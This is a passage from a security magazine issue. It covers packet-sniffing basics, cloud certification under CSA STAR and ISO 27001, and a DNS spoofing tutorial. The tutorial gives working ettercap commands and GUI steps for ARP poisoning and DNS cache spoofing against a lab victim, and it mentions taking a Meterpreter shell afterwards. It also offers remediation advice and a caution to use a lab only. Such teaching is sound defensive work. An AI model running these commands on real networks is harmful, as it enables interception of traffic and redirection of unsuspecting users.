and necessary information can be obtained. Thus, the place where the fault is present can be identified, and
33

www.eForensicsMag.com

necessary actions can be taken. Normally, there are three basic types of packet sniffing, and they are
ARP sniffing, IP sniffing and MAC sniffing.
In ARP sniffing, the information is transferred to the ARP cache of the hosts. The network traffic is directed towards the administrator. In IP sniffing, the information corresponding to an IP address filter is
captured. MAC sniffing is similar to IP sniffing except for device sniffing information packets of a particular MAC address.
COMPONENTS OF PACKET SNIFFER
Before delving in detail on how packet sniffers work, it is important to understand the components that
are part of the sniffer. The four major parts of a sniffer are hardware, driver, buffer and packet analysis.
Most packet sniffers work with common adapters, but some require multi adapters, wireless adapters
and others. Before installing the sniffer in the system, diagnose whether the system contains the necessary adapter for the sniffer. Next important component for a sniffer to work is the drive program. Without
the driver, the sniffer cannot be installed in the system. Once the sniffer is installed, it requires a buffer
that is the storage device for capturing data from the network.
There are two types in which data can be stored in the buffer. In the first method, the data can be stored
in the buffer until the storage space runs out. This prevents new data from being stored as there is no
storage space. The other method is to replace the old data with new data as and when the buffer overflows. The forensic investigator or network administrator has the option to select buffer storage method.
Also, the size of the buffer depends on the EMS memory (Expanded memory specification) of the computer. When the EMS memory of the computer is higher, more data can be stored in the buffer.
The packet analysis is the most essential and core part of the sniffing process as it captures and analyses the data from the packets. Many advanced snipping tools have been introduced of late which allows
users to replay the stored contents so that they can be edited and retransmitted based on requirements.
WORKING PRINCIPLE
The working principle of a sniffing tool is very simple. The network interfaces present in the segment will
usually have a hardware address, and they can see the data that is transmitted over the physical medium. The hardware address of one network interface is designed to be unique so it should be different
from the address of another network interface. Hence, packet that is transmitted over the network will
pass through the host machines, but will be ignored by the machines except for the one to which the
packet is destined to. However, in practice, this is not always the case because hardware addresses can
be changed in software and virtualization technologies are frequently used to generate hardware addresses for virtual machines from a set pool.
In IP networks, each network has a subnet mask, network address and broadcast address. An IP address consists of two parts namely network address and host address. The subnet mask helps in separating the IP address into network and host address. The host address is further broken down as subnet address and host address. The subnet mask identifies the IP address of the system by performing
AND operation on netmask. It converts the network bits to 1 and host bits to 0. Any network will have two
special reserved host addresses, 0 for network address and 255 for host address. Subnetting a network
helps in breaking down bigger networks into smaller multiple networks. Network address is an address
that identifies a node in a network. The network addresses are unique within a network and there can
be more than one network address within any network. A broadcast address is a special address that is
used to transmit messages to multiple recipients. Broadcast addresses help network administrators in
verifying successful data transmission over the network. Broadcast address is used by various clients
and the most important of them are dynamic host configuration protocol and bootstrap protocol that use
the address to transmit server requests.
When a network interface card is configured, it will respond to the target network having addresses that
exist in the same network as designated by the subnet mask and network address. This is how packet
sniffing works and the three basic steps of packet sniffing are collection, conversion and analysis.

COLLECTION

The first step in packet sniffing technique is the collection of raw data from the packets that travel along
the network. The sniffer will switch the required network interface to promiscuous mode that will enable
34

www.eForensicsMag.com

data packets from hosts in the system to be captured. When this mode is turned off, only the packets
that are addressed to a particular interface will be captured. When this mode is turned on, all packets
received on a particular interface will be captured. Packets that are received by the NIC are stored in a
buffer and then processed.
It is important for forensic investigator or network administrator to understand where to fit in a packet
sniffer for it to capture packets effectively. This is called tapping the wire or getting on the wire in which
the packet sniffer is placed in the correct physical location. Placing the sniffer tool at the right position
is as tough as analyzing the packets for information. Since there are hardware devices in connecting a
network, placing the tool at wrong position will not fetch packets. As seen before, the network interface
card should be in promiscuous mode for capturing the data that is flowing across the network. Usually,
the operating systems do not allow the forensic investigator or network administrators to turn promiscuous mode on. Individual forensic investigator or network administrator privileges are required to enable
this mode, and if that is not possible, packet sniffing cannot be carried out in that particular network. It is
much easier to sniff around the packets in a network that has hubs installed because, when traffic is sent
over a hub; it traverses to every port that is connected to the hub. Hence, once you connect the packet
sniffer to an empty port of the hub, you will receive packets travelling across the hub.

Figure 4. Example of one location where packet sniffer can be placed. Source: http://www.windowsecurity.com/articlestutorials/misc_network_security/Network_Analyzers_Part1.html.

The most common type of network is a switched network as it allows broadcast, multicast and unicast
traffic. It also supports full duplex communication in which the host system can send and receive packets simultaneously. This increases the complexity of setting up packet sniffing tool in a switched environment. Also, the traffic that is sent to the broadcast address and the host machine can only be captured.
Hence the visibility window for the packet sniffer is far lower in a switched environment.
There are three common types of capturing data in a switched network and they are port mirroring,
ARP Cache poisoning and hubbing out. Port mirroring is the simplest of the three ways by which packets can be captured. The forensic investigator or network administrator must be able to access the command line interface of the switch for enabling port mirroring. As a forensic investigator or network administrator, you need to do is enter a command in the command line interface which enables the switch to
copy traffic from one port to another.
Another method of capturing the data in switched environment is hubbing out, which is a technique in
which the target device and the analyzer are localized within a network by connecting them directly to
the hub. In hubbing out method, forensic investigator or network administrator needs a hub and some
network cables to connect the target to the hub. First, unplug the host from the network, followed by plugging the target and the analyzer to the hub. Then, connect the hub to a network switch which enables the
data to be transferred to the nub and simultaneously to the analyzer.
35

www.eForensicsMag.com

In the seven layer OSI model, the second layer contains MAC addresses while the third layer contains
IP addresses, and both these addresses should be used in conjunction for network data transfer. The
switches are present in the second layer and hence, the MAC addresses should be converted to IP addresses and vice versa for data transfer. This translation process is called as address resolution protocol.
Whenever a computer needs to transfer data to another computer, an ARP request is sent to the switch,
which then sends ARP broadcast packet to the systems that are connected to the computer. The target
computer which has the equivalent IP address responds to the request by sending out its MAC address.
This information is then stored in the cache so that future connections can use this data without sending
out new request. This method can easily capture the traffic across the network, and hence ARP cache
poisoning is otherwise called as ARP spoofing.

CONVERSION

In this step, the raw data that is captured in the collection step is converted to human readable form. The
converted data can only be analyzed for information that can be useful for the network administrator. The
work of most of the command prompt packet sniffers stop at this point of time and the remaining work are
left over to the end forensic investigator or network administrator.

ANALYSIS

The third and final step of packet sniffing technique is analysis in which the data present in human readable form is analyzed to gather required information. Multiple packets are compared to obtain the behavior of the network. The GUI based packet sniffing tools are handy at this time as they have comparison
tools as well.
All these methods ensure that the right packets are captured as part of packet sniffing technique. The
network problems can be analyzed, and necessary actions can be taken by the network administrators to
prevent further problem in the network. The three packet sniffing tools mentioned above are used widely
among the audiences around the globe.
The goal of analyzing data in computer forensics is to identify and explore the digital content for preserving and recovering the original data that is present. There are various instances where computer forensics has come in handy for network administrators. Live analysis is the most effective technique as it
ensures that the encrypted file systems can also be captured and analyzed.
ABOUT THE AUTHOR

Eric A. Vanderburg, MBA, CISSP,Director of Information Systems and Security at JURINNOV,Technology Leader, Author, Expert Witness, and Cyber Investigator.

36

www.eForensicsMag.com

UNDERSTANDING
DOMAIN NAME SYSTEM
by Amit Kumar Sharma

Domain Name System (DNS) DNS spoofing also referred to as


DNS cache poisoning in the technical world is an attack wherein
junk (customized data) is added into the Domain Name System
name servers cache database, which causes it to return incorrect
data thereby diverting the traffic to the attackers computer.

ets understand this attack today. For this we have to have an understanding of the DNS first. So what we will do is understand the DNS and
then we will see what is an ARP and a DNS spoofing attack.

UNDERSTANDING DNS

Any website has an identity for it, which is usually known as the domain name,
but at the backend it is identified by an IP address. For any computer it is the
IP address which matters but who tells the computer what the IP address for
a specific Website is or vice versa. It is the DNS. DNS is responsible for the
translation of the domain name to an IP address.
If you type an address in the address bar, believe me a lot of things go on in
the background. The DNS server translates the domain name into an IP address and this process is called as DNS resolution.
RFC1035 describes the DNS protocol wherein it is recommended that the
DNS should generally operate over the UDP protocol. UDP is preferred over
the TCP for most DNS requests for its low overhead.
You can find more details about DNS under the following RFCs
IETF RFC 1034: DOMAIN NAMES CONCEPTS AND FACILITIES
IETF RFC 1912: COMMON DNS OPERATIONAL AND CONFIGURATIONAL ERRORs
IETF RFC 2181: CLARIFICATION TO THE DNS SPECIFICATIONS
IETF RFC 1035: DOMAIN NAMES IMPLEMENTATION AND SPECIFICATION

PORT 53

Out of all the ports existing PORT 53 was the one which was chosen to run
the DNS service. Port 53 supports both TCP and UDP. TCP is given the responsibility for zone transfers of full name record databases whereas UDP
handles individual lookups.
37

www.eForensicsMag.com

TCP is used for handling zone transfer because of its connection oriented nature. This nature helps the
DNS servers to establish connection between them to transfer the zone data wherein the Source and
Destination DNS Servers are responsible to make sure about consistency by may be using the TCP ACK
bit or some other logic which varies.
One thing that we have to keep in mind is that zone transfers are prone to give away the entire network maps.
The UDP used in port 53 is a connection less communications protocol for a couple of layers including
the Internet network layer, transport layer, and session layer. It makes the transmission of a datagram
message from one computer to an application running in another computer possible on port 53.
UDP also plays an important role when it comes to performance and resolution of DNS. As it is a connectionless protocol there is no need for it to maintain state or connections thereby making it more efficient. When a DNS message is sent across messages are sent over UDP and DNS servers bind it to
UDP port 53. If the message length exceeds the default message size for a UDP datagram (512 octets),
the first response to the message is sent with as much data as the UDP datagram will allow, and then
the DNS server sets a flag indicating a truncated response. Later it is the responsibility of the message
sender on how to send the next message i.e over TCP or UDP again.
So if you get a PORT 53 open on a port scanning results. Bingo you may try attacks pertaining to it.
Lets go a little deeper to understand what is meant by DNS resolving.

DNS RESOLVING

The jinx here is that we humans are good at remembering things related to Alphabets and the reverse is
true with our counterparts The Computer System which understands numbers better. All the computers are identified on the basis of their number and it is really difficult for a human brain to remember so
many numbers The IP address of the various servers around the world which has huge data that end
user wanted to access.
So DNS came to the rescue. It actually resolves the actual names (Domain name) that is fairly simple
to remember into the IP address of the servers. DNS can be treat as a huge database which has millions
of records each conveying on what IP address is for what domain.
A trivial example will look like.
NAME

TYPE

VALUE

Admin

127.0.0.1

Site.test.com

192.168.1.3

Site.victim.org

192.168.1.5

Site.example.com.

MX

Mywebsite.com

192.168.1.7

Mail

CNAME

192.168.1.11

ftp

CNAME

192.168.1.219

ftp

CNAME

192.168.1.82

www

CNAME

192.168.1.19

Now let us consider that the end user which wants to visit a website called as www.searchforme.com
Let us see on what are the steps that takes place at the backend and my browser shows me the webpage with a blink of an eye. WINK ;)
When we write www.searchforme.com in the address bar of the browser, we actually dont notice that
we also have an invisible . at the end of this address. This powerful . is called as the ROOT. Once we
write the address, your web browser or your operating system will first determine whether they know this
domain already by looking in a local file on your computer called host. This file contains domain names
and their associated IP address. If they know it they will return the domain but if not there are other
38

www.eForensicsMag.com

people who get involved and the search becomes dirtier. All the OSs are configured or designed to ask
a resolving name server the same question of the whereabouts of www.searchforme.com. And all the
resolving name servers are so designed that they know the location of the ROOT Server.
Considering that we have got hard luck and we didnt still find where our website is, we will take it as a
NO from the ROOT server which in turn queries the TLD (Top Level Domain) Name server for the address.
Now the TLD name server in case doesnt get the answer for our website queries the Authoritative
Name Server (ANS). Now here is the turning point as in how does this server know about the address
of the queried website.
The answer is the DOMAIN Registrar which keeps a record of all the domains which are purchased and
the details of the buyer and the authenticity of the same. It also has a record, on, which Authoritative Name
Server to be used for this specific Domain. They also notify the organization responsible for the Top Level
Domain which is called as the registry which in turn updates the TLD Name Servers of the domain.
Now the resolving name server takes the response from the TLD name server and stores it in their
cache and finally reaches to the Authoritative Name Server which resolves the www.searchforme.com
server to its corresponding IP address.
Finally the resolving server fetches this query and gives back to the OS which in turn directs the browser to reach out to the IP address.
Gosh so many things go at a time so fast!!!
Now to increase the performance of all these activities, all these intermediate servers store the request
and response queries in their CACHE to ensure that when any similar queries arrives, the servers picks
up from the cache instead of reaching out to the Registry all the time.

DNS TERMINOLOGIES

The whole of DNS can be treated as a tree structure wherein the ROOT is at the top and subdivided into
DOMAINs, subdomains and zones.

DOMAIN NAME AND ZONES

The domain Name Space is divided into the following though the list may be non-exhaustive












Com: commercial organizations.


Edu: Educational organizations.
Gov: Government organizations
Mil: Military organizations
Net: Networking organizations
Org: noncommercial organizations
Aero: air-transport industry
Biz:for businesses purposes
Coop: for cooperatives
info: For all uses
Museum: For the museums
Name: For the individuals
Pro: For professions

There are others as well which are based on the country like ie for Ireland and .jp for Japan. And believe me with the increase in the Internet this list is tremendously increasing and becoming more and
more structural.
Now all these domains are further divided into subdomains and then to Zones. Below is a small demonstration of the tree structure for understanding.

39

www.eForensicsMag.com

Figure 1. DNS tree structure*


*: This diagram is only for demonstration purpose.

All the ones in orange are called as TLD(Top level Domains). These domains in turn have subdomains
which further are classified as different zones.
Now for an instance if we see that we want a Fully Qualified Domain Name (FQDN) for the domain okies, it will be Okies.m.test.com, where m can be a subdomain for domain test.
When a query is generated for the DNS it is usually for the A type record which directly translates the
domain to the IP address.
The table below shows generic calls/queries and more parameters can be found at: http://www.iana.
org/assignments/dns-parameters.
Type

Value

Description

IPv4 Address

AAAA

28

IPv6 Address

NS

Name Server

AXFR

252

Request for Zone Transfer

MX

15

Mail Exchange

CNAME

Canonical Name

Before moving to the evil part we should also concentrate on the AAAA type for the IPV6 address. With
the advent of IPV6 address in the huge internet we cannot ignore its concepts and its role in DNS.
AAAA (Quad A) records are the IPv6 address records which map a host name to an IPv6 address. This
stands for AUTHENTICATION, AUTHORIZATION, ACCOUNTING, AUDITING. AAAA record type is capable of storing a 128 bit iPV6 address. Similarly an AAAA query for a specified domain name returns all
the associated AAAA records in the response.
Lets get down to do some evil part now.

40

www.eForensicsMag.com

THE EVIL (FUN) PART J

As we noticed that DNS is a very crucial part of the internet and plays a very important role in the resolving of the websites thereby making the end user experience easy.
But this functionality can be used in the other way to make all this, a bad experience. There are a couple of vulnerabilities or weakness present with DNS and its functionality. So if we are not able to configure our DNS server properly we can be in BIG trouble. An evil mind can do a lot of tweaks and believe
me, can be very harmful if he/she are able to exploit the DNS. There are a couple of vulnerabilities which
are present with respect to the DNS like:






DNS cache Poisoning


Denial of service attack (which nearly runs for everything)
Unauthorized Zone transfer
Buffer overflow
Hijacking
DNS Misconfiguration
Spoofing the DNS response

We will discuss cache poisoning and spoofing as a part of this article.

Figure 2. A typical DNS cache in a windows machine

DNS SPOOFING
DNS spoofing is said to happen when a DNS server starts accepting and using incorrect information from
an illegitimate HOST who has provided the required information. During this attack malicious data is successfully placed in the Cache of the server. This misleads the authority with the user getting redirected
to a wrong website which can be the one hosted form a malicious user and can hijack the user who will
not even come to know that something wrong has happened.
41

www.eForensicsMag.com

This spoofing can be done in a number of ways:


DNS cache Poisoning
Breaking the Platform- Really Tough
Spoofing the DNS response
Lets see how we can spoof the DNS through Cache Poisoning.

DNS CACHE AND POISONING


When we type a URL in the address bar we actually are sending a DNS query. A record of these queries is
also stored in a temporary storage location on your computer called as DNS cache. Now the DNS always
checks the cache before querying any of the DNS servers and if a record is found it uses that instead of
querying the server which in turn makes the query faster and decreases the network traffic as well.
So our target is this cache. If we are successful in poisoning the cache with the flaw in the DNS software, and if the server does not correctly validate DNS responses to ensure that they are from an authentic source, the server will end up caching the incorrect entries locally and serve them to other users
that make the same request (see Figure 2).
Get your Hacker Hat (ofcourse the White One) and start your weapon. For me the weapon is my BackTrack Machine which I have named as ARCHIE 192.168.1.7
Ettercap is a very famous tool that we are going to use here. This tool is also available for windows. It
has various uses but for this exercise we will use it to spoof the DNS.
We are choosing ettercap for two reasons. One is it is awesomely user friendly and easy to use and
second because of its easily accessible dns_spoof library in handy.

Figure 3. Attack Perspective

Step 1-Victim Sends DNS query


Step 2-Fake DNS reply
Step 3-Victim unknowingly starts communicating
Below is a sample diagram for the attacker and the victim machine.
OUR Attacker machine 192.168.1.7
Our victim machine is a windows machine 192.168.1.19
42

www.eForensicsMag.com

Figure 4. Attacker and the Victim Machine

So what we will try to do is first we will perform ARP Spoofing and then try to poison the cache and then
try to access the poisoned cache and verify the results.
Prerequisite that you should cross check is.
Check whether IP forwarding is enabled or not in the file.
/proc/sys/net/ipv4/ip_forward

If the value is 0 which here is, you need to change it to 1 with the command
Echo 1 > /proc/sys/net/ipv4/ip_forward

Next is to locate the etter.dns file by the command


Locate etter.dns

You can use the utility of Linux VI editor or NANO for editing purposes.
Now edit the file in the location:
vi

/usr/local/share/ettercap/etter.dns

To add the following entry


*.mywebsite.com as the name and A being the type to the IP address 192.168.1.7 which is the address the attackers machine (my Backtrack machine in this case). This ensures that any traffic towards
the *.mywebsite.com will be redirected to my machine.

43

www.eForensicsMag.com

Now consider a victim machine which is with the IP address 192.168.1.19 has Windows 7 as Operating
system. Now let us see what are the results of the ping our www.mywebsite.com.
Pinging results gives us the IP address as 64.120.230.71 with the behavior as expected. Screen shot below

Figure 5. Victim machine before the attack

Now let us perform the attack.


The command from ettercap is
ettercap -T -q -M arp:remote -P dns_spoof //

This will actually launch an Arp poisoning attack for the entire network we are connected to. So please
be cautious before trying this attack
Now once the attack starts we go back to our victim machine and ping the website again to see whether
our attack is working or not.

44

www.eForensicsMag.com

Figure 6. Victim Machine after the attack

Bingo there it is, the attack was successful. So with this we were successfully able to spoof the DNS and
redirect all the traffic coming to www.mywebsite.com to our IP address. Now it depends on the attacker on
how much damage he wants to cause from getting a Metasploit meterpreter shell to steal data etc.
To explore more of the tool you can use the following command:
Ettercap h

The same thing can be done via the GUI of ettercap as well which is very easy to use. Below are the steps.
For the GUI of ettercap either you can download directly from the website or if you are using BackTrack
the following command comes in handy.

45

www.eForensicsMag.com

Ettercap -G

This will launch the ettercap GUI. Below is the interfaceJ:

Figure 7. Ettercap GUI interface

Next you have to select the interface. In this case it is eth0:

Figure 8. Selecting your network interface

Once you haveselected OK, the following plugins load and are ready to use.
Next we click on HOSTS tab and click on Scan HOST

46

www.eForensicsMag.com

Figure 9. Host menu item

On scanning host ettercap will scan for all the hosts that are alive. Now we can select from this list of
hosts and add to the target list. Once you have added the target IP in the target list which in this case is
192.168.1.19.
Next we select the MITM menu item and click on ARP poisoning.

Figure 10. Performing ARP poisoning

The window below pops up and now click on OK.

Figure 11. ARP poisoning

Once you click on OK the tool performs the attack by sending the ARP packets.
For launching the DNS spoof attack.

47

www.eForensicsMag.com

Go to the PLUGIN menu item. Scroll down to search for the dns_spoof plugin. Double clicking on the
same will launch this plugin and hence spoof the dns.

Figure 12. dns_spoof plugin

REMEDIATION

IF you see the basic working of DNS queries the remediation will be right in front of your eyes. These
attacks are not effective if the attacker is not able to send the initial query of identification of a domain.
For this you can limit the access to the computers which you rely or which are required. Performing end
to end validation post the connection is established can be used to check for the authenticity of data.
One very effective solution can be the randomization of source port for DNS requests. Other solutions
can be upgrading your DNS servers to inculcate security with DNSSEC. Performing the configuration of
name severs in a proper manner keeping in mind the security aspect of it. Auditing the servers regularly
to check on any kind of security flaws and implementing the patches regularly as and when required periodically has to be performed to be safe.

WORD OF CAUTION

Do not use this attack on a live network. Please make up a small environment and perform the attack
only for education basis and to learn the concepts.
REFERENCES

http://www.dns.net/dnsrd/
http://cr.yp.to/djbdns/notes.html
http://www.sans.org
http://www.google.com

ABOUT THE AUTHOR

Amit Kumar Sharma commonly known as AKS-44 has a B.E in EC and works in Information Security for a reputed firm. He is
passionate about Security and spends his time learning/researching in the wild.

48

www.eForensicsMag.com

CSA CERTIFICATION

OFFERS SIMPLE, COST EFFECTIVE WAY


TO EVALUATE AND COMPARE CLOUD
PROVIDERS
by John DiMaria

Technological developments, constricted budgets, and the need


for flexible access have led to an increase in business demand for
cloud computing. Many organizations are wary of cloud services,
however, due to apprehensions around security issues. Ernst
& Young conducted a survey of C-level leaders in 52 countries
which showed a unified concern over the accelerated rate
that companies are moving information to the cloud and the
subsequent demise of physical boundaries and infrastructure.

he widespread adoption of mobile devices only serves to accelerate


this trend. Now employees, customers, suppliers, and other stakeholders can access data wherever and whenever they wish, intensifying
concerns surrounding security and privacy. (Ernst & Young 2011 Global Information Security Survey Out of the Cloud into the fog, 2011).
Companies are moving from traditional IT staffing outsourcing contracts to
cloud service providers, forever altering their business model and IT functions, with the potential to greatly reduce or even eliminate in-house IT operations. Security and quality must be of highest concern, and focused on the
most important assets any company has . customers and stakeholders.
BSI, a leading certification body and business improvement solutions provider in 2012 teamed up with the Cloud Security Alliance (CSA), an independent not-for-profit coalition comprised of industry leaders, associations, and information security experts. Together they identified serious gaps within the IT
ecosystem that inhibit market adoption of secure and reliable cloud services.
They found that businesses did not have simple, cost effective ways to evaluate and compare their providers resilience, data protection capabilities and
service portability.
CSA and BSI recognized that there was no single program, regulation or
other compliance regime that would meet the future demands of IT as well as
address the risk of adding complexity to the already overloaded and costly
49

www.eForensicsMag.com

compliance landscape. The rise of the cloud as a global computer utility, however, demands better harmonization of compliance concerns and business needs.
The Ernst & Young survey supported their findings, which revealed that while companies are trying
to respond, they fully admit that the information security budget may not be effectively applied. Just
over half of companies indicated that their security functions do not meet the needs of the organization.
Most admit that they have a heavy reliance on trust when it comes to outsourcing IT services, but what
they need are validation, verification, and certification. The vast majority of companies are ready to mandate a Standard of Care and Due Diligence with almost ninety percent in favor of external certification
and forty-five percent insisting it be based on an agreed upon internationally-accepted standard.
While there was already a self-declaration process available through the CSA Security, Trust and Assurance Registry (STAR), it was evident that without a formal validation and verification process that complies
with international standards, self-declaration would not fill the need for transparency and trust. There were
also questions regarding whether or not the scope of self-declaration was fit-for-purpose as there was no
real measurement of how the processes were to be managed to ensure optimization (maturity).
BSI developed a process that would be user friendly, allow 3rd party validation and verification, and
provide a formal certification that would be internationally accepted.
After many discussions with users, industry experts, and service providers, it was clear that any new
standard would be overkill and just add to the confusion of the plethora of standards already in existence.
A new standard would also have to build credibility over the long term thus inhibiting adoption.

ISO/IEC 27001 THE FOUNDATION FOR STAR CERTIFICATION

The gold standard since 2005, ISO/IEC 27001 is the most accepted internationally-endorsed standard for
information security in the world. In some countries, like Japan, ISO/IEC 27001 has been mandated by
the government particularly for publicly-traded companies, but over the years has cascaded down through
the supply-chain. Many other countries are jumping on board by requiring tighter controls over information
security across a variety of industries, as well as their critical suppliers and extended business partners.
Companies also realize they must be leaner, asking more of each employee while settling for smaller
budgets. Moving to the cloud is in part a reaction to increased IT costs as it provides more IT services
for a smaller investment. Unfortunately, it comes with increased risk, and companies are looking for a
globally-accepted standard and 3rd party verification that can serve as a screening process for suppliers,
particularly Cloud Service Providers. ISO 27001 has a long history going back to 1995 when BS 7799
was introduced. It was improved over the years taking into consideration the ever-changing compliance
and regulatory landscape for information security.

50

www.eForensicsMag.com

Originally based on the Plan Do Check Act Model (PDCA), ISO 27001 is consistent with and easily
integrated into other management systems standards and regulatory requirements. With the release of
ISO/IEC 27001:2013, there will be increased consistency across all standards.

ISO 27001 has been called the umbrella standard because of its strong management system foundation that ensures business systems and objectives are in place that drive process ownership and continual improvement.

As stated in Annex A within the standard, ISO/IEC 27001 contains a comprehensive list of control objectives and controls that have been found to be commonly relevant in organizations. Users of this International Standard are directed to Annex A as a starting point for control selection to ensure that no important control options are overlooked. Additional controls may be necessary for cloud service providers,
however. Some controls can be excluded with clear evidential justification and others can be replaced
with compensating controls that meet or exceed the same requirement. In terms of the cloud, controls
like those in the Cloud Control Matrix (CCM) can be added or even substituted, if justified.

51

www.eForensicsMag.com

Security standards that rely on self-assessment techniques and checklists ultimately fail to engage the
deeper concerns of CIOs and CISOs. ISO/IEC 27001 plus CCM is certifiable by an accredited firm and
has a formal management system to detect ongoing vulnerabilities, create information security controls,
and preempt security threats. It is risk-based, and its assessment helps identify the controls needed to
secure information. For this reason, ISO/IEC 27001 was used as the foundation for STAR Certification,
but it can be used with any other industry-specific standard and/or framework either to supplement it or
for specific needs such as government or healthcare contracts. The CCM can act as additional or compensatory controls to build a unified integrated system rather than reinforcing islands of information.
The CCM is specifically designed to provide fundamental security principles to guide cloud vendors
and to assist prospective cloud customers in assessing the overall security risk of a cloud provider.
This matrix is meant to be integrated into the assessment by the auditor; referencing the applicable
CCM control to the associated ISO 27001 controls (Statement of Applicability). The output will be the result of the overall performance of the organization within the scope of certification.

Figure 1. SOA

To further the value and increase transparency, CSA STAR Certification contains a maturity model to
assess how well managed the activities are in the control areas. The resulting maturity score helps drive
internal improvements within the organization, but will not be listed on certificates.
An organization must demonstrate that it has all the controls in place and operating effectively, however, before an assessment of the management capability around the controls can take place.
When an organization is audited, a Management Capability Score will be assigned to each of the control
areas in the CCM. This will indicate the capability of the management in this area to ensure the control is
operating effectively.

52

www.eForensicsMag.com

Figure 2. CCM Control Areas

The management capability of the controls will be scored on a scale of 1-15. These scores have been
divided into 5 different categories that describe the type of approach characteristic of each group of scores.

Figure 3. Maturity Rating

In order to make it possible for an assessor to consistently apply a score to the control area, each auditor is provided a grid that outlines what would be required of an organization to achieve each score.
Depending on the capability level the client achieves, the audit report will categorize performance
against the maturity model as:
No Award
A Bronze Award
A Silver Award
A Gold Award
ISO 27001 is a management systems standard and by definition requires a systematic approach to managing an organization. Therefore, if an organization is certified to ISO 27001, it is very unlikely that they
would not achieve at least a bronze award.
STAR Certification leverages an holistic information security management system (ISO/IEC 27001)
that, when applied using good risk management discipline, can address all cloud specific risks and relevant aspects of information security. Its benefits depend on proper scope and implementation; it must be
Service Level Agreement (SLA. SLA complements and forms part of a service agreement. It is a means
used to incorporate business strategic objectives and define the business desired results) driven.

53

www.eForensicsMag.com

Clients care about the security of their sensitive information and they care that cloud providers are certified. However to provide the best level of security and service, management system implementation is
equally important as it must be fit-for-purpose. A scope that is not is rather insignificant when it comes
to cloud services. STAR Certification uniquely looks into scope relative to service, ensuring the most
meaningful certification and providing evidence of 3rd party approval.

SUMMARY
ISO 27001 requires the organization to evaluate customers requirements and expectations, as well
as contractual requirements. To achieve this, it requires a system to be implemented.
ISO 27001 requires the organization to conduct a risk analysis that identifies the risks to meeting
customers expectations.
CCM requires the organization to address specific issues that are critical to cloud security.
STAR Certification ensures the proper implementation and effectiveness of the CCM controls and
scope are fit-for-purpose and SLA Driven.
The maturity model assesses and scores how well managed activities are in the control areas, providing a clear route for continual improvement.
IN THE NEXT MODULE WE WILL COVER
Road Map to CSA STAR Certification Optimizing processes, reducing costs and meeting international
requirements.
ABOUT BSI

Our comprehensive approach creates a gateway to excellence


for your organization. BSIs training, assessment services, and software enable your business to continually improve. BSIs internal and lead auditor training provides an understanding of the rigors of management system standards and how to ensure compliance. Our assessments offer independent audits of your adherence to these standards. BSIs configurable, web-based software solution, Entropy, automates risk management, document
control, audit and compliance, performance, and incident management, effectively managing the drive for continuous improvement across the organization. From the decision to improve systems through to registration and continual improvement, BSI is
your business improvement solutions partner.

ABOUT THE AUTHOR

John DiMaria; CSSBB, HISP, MHISP, AMBCI, is the ISO Product Manager for BSI Group Americas. He
has 30 years of successful experience in Standards and Management System Development, including
Information Systems, ITSM, Business Continuity and Quality Assurance. John is responsible for overseeing, product roll-out, and client/sales education. He is a product spokesperson for BSI Group America, Inc
regarding all standards covering Risk, Quality, Sustainability and Regulatory Compliance. John was one
of the key innovators of CSA STAR Certification for cloud providers, a contributing author of the American
Bar Associations Cybersecurity Handbook, a working group member and key contributor to the NIST Cybersecurity Framework.

John has been a keynote speaker internationally and featured in many publications concerning various topics regarding information security, sustainability and business continuity such as Computer World, Quality Magazine, Continuity Insights, Health
and Safety Magazine, ABA Banking Journal, CPM Magazine, and Disaster Recovery Journal, GSN Magazine (dubbed Business Continuitys new standard bearer) and featured on the cover of PENTEST Magazine.

54

www.eForensicsMag.com

ROAD MAP TO CSA


STAR CERTIFICATION
OPTIMIZING PROCESSES, REDUCING COST AND
MEETING INTERNATIONAL REQUIREMENTS
by John DiMaria

Corporate strategist Joel A. Barker stated, when a paradigm


shifts, everything goes back to zero, and illustrated this meaning
with the example of watchmaking (Joel A. Barker, Paradigms:
The Business of Discovering the Future (New York: HarperCollins
Publishers 1993) 15. 1993, p15.).

or centuries, the Swiss dominated the watchmaking industry and their


national identity was somewhat tied to their expertise in the precision
mechanics required to making accurate timepieces. Yet the Swiss were
so passionate about their expertise that they hesitated to embrace the new
technology in watchmaking with batteries and quartz crystals. With Japans
introduction of the quartz wristwatch in 1969, the majority Swiss market share
dropped from 80% at the end of World War II to only 10% in 1974 (Aran
Hegarty, Innovation in the Watch Industry, Timezone.com, (November 1996)
http://people.timezone.com/library/archives/archives0097). Ironically, it was
the Swiss who had invented the quartz watch but failed to see its potential.
When a paradigm shifts, you cannot count on past success. New technology, like the quartz in watchmaking, can revolutionize a market, creating a tectonic shift in accepted practice. The advent of the Cloud is such an advancement in technology and optimization of its capability the new paradigm. How
organizations evaluate Cloud Service Providers (CSPs) has become key to
maximizing that optimization. CSA STAR Certification is the new cloud security standard of excellence.
NOTE

Some of the concepts in article 1 are a prerequisite for this article. It is recommended that you
read article 1 if you have not already done so.

55

www.eForensicsMag.com

Figure 1. The Business Challenge

Figure 2. Why Optimization?

Optimization of processes is critical to ensure continual improvement. The goal is to lower costs by
increasing efficiencies to offset the costs of increasing security. This will allow improved services to the
customer base.

Figure 3. Optimization Process

However, optimization cannot occur without fully analyzing the organizations current status. Measuring
where the organization is today versus where it needs to be long term is critical to optimizing processes.

56

www.eForensicsMag.com

BUILDING THE BUSINESS CASE FOR PURSUING STAR CERTIFICATION

The benefits for becoming STAR Certified are extensive. To build a convincing business case requires a
number of factors. The following is a list of points that have been developed from companies that have
become certified.

CERTIFICATION FOR CLOUD SERVICES IS ON THE GLOBAL AGENDA


In the Agenda of the European Commission
Requested from Art.29 (Art.29 Working Party European commission.) WP as a measure for privacy compliance
Already part of government cloud strategy in countries such as USA, Singapore, Thailand, China,
Honk Kong, Taiwan
In Europe various Member States are looking at a certification/accreditation schema for cloud service especially in Public Procurement
The UK G-Cloud is based on logic of companies accredited to offer service in the App Store. STAR
process meets these requirements.

CSA STAR PRINCIPLES ARE AN EXTENSION OF SCOPE FOR ISO/IEC 27001


Comparability results are repeatable, quantifiable and comparable across different certification targets
Scalability the scheme can be applied to large and small organizations
Proportionality (risk-based) evaluation takes into account risk of occurrence of threats for which
controls are implemented
Composability/modularity addresses the issue of composition of cloud services including dependencies and inheritance/reusability of certifications
Technology neutrality allows innovative or alternative security measures
Transparency of the overall auditing process

CSA STAR CERTIFICATION IS USER AND BUSINESS FRIENDLY










Provides a globally relevant certification to reduce duplication of efforts


Addresses localized, national-state and regional compliance needs
Addresses industry specific requirements
Addresses different assurance requirements
Addresses certification staleness assure provider is still secure after point in time certification
User-centric
Voluntary, business driven
Leverage global standards/schemes
